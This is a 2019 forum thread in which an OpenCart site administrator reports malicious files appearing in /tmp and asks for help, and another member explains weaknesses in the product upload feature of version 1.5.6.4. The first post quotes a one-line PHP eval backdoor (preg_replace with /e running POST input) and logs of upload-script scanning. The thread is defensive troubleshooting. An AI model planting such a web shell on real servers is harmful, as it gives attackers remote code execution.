Post by garyw75 » Thu Aug 15, 2019 3:30 pm

We are a design agency purely running Opencart on our servers. Versions we have installed range from 1.5.6.4 upwards.

Our malware and virus software on the webserver is starting to pick up files in the /tmp folder. The files are Opencart session files so we believe Opencarts upload functionality is the source of the file creation.

During the night we see mainly different 1.5.6.4 installs being used to create the files but there has been one or two instances of version 3 installs doing it.

-rw------- 1 website website 1400195 Aug 13 16:26 20190813-162642-XVLWsnW@S2pF81WGLe3uagAAAA0-file-uLQeCe

The files contain malicious code like this:-

EEC4D8E4439299046B8CDB3F782<?php @preg_replace("/[pageerror]/e",$_POST['xbfk'],"saft"); ?>[root@host tmp]#

On checking the logs we can see automated crawlers scanning the server for upload scripts but Im unsure what to look for in terms of any Opencart upload functionality:-

[12/Aug/2019:22:28:23 +0100] "POST /chat/upload.php HTTP/1.1" 301 537 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
[12/Aug/2019:22:28:23 +0100] "POST /Chat/upload.php HTTP/1.1" 301 481 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
[12/Aug/2019:22:28:23 +0100] "POST /en/upload.php HTTP/1.1" 301 477 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
[12/Aug/2019:22:28:24 +0100] "POST /chat/FlashChat_v608/chat/upload.php HTTP/1.1" 301 521 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"

+ 100s more

They are obviously scanning for vulnerable upload pages in all different types of software. Presumably one of the checks is for Opencart and its upload functionality if it has in fact been compromised.

As I have already said we do not have anything else on the server apart from Opencart. I have checked the CVE Details website for any new vulnerabilities but nothing is listed.

Can anyone check if they are experiencing the same thing. Or can offer any advise?

Thanks very much
Gary

New member

Posts

Joined
Thu May 12, 2016 7:59 pm

Post by ADD Creative » Fri Aug 16, 2019 5:03 am

It's possible to upload files using the product upload feature in 1.5.6.4. You need to look in your logs for access to /index.php?route=product/product/upload

An uploaded file will initially go to the PHP upload_tmp_dir. However, it will then be moved to the OpenCart DIR_DOWNLOAD directory with a random token added to the filename. There were a few weaknesses with this system. The random number generator used for the token is not considered secure. The new filename is returned in the response encrypted, but only weakly. Earlier OpenCart versions set the encryption key in the settings to a common value.

If you are worried about file upload and you don't have products that require a customer to upload an image file, it's probably best to comment out the upload function in /catalog/controller/product/product.php.

www.add-creative.co.uk


Expert Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom

Post by garyw75 » Fri Aug 16, 2019 9:13 pm

Thanks very much for the pointer. I will take a look at this and lock down the sites.
Thanks again
Gary

New member

Posts

Joined
Thu May 12, 2016 7:59 pm
Who is online

Users browsing this forum: No registered users and 23 guests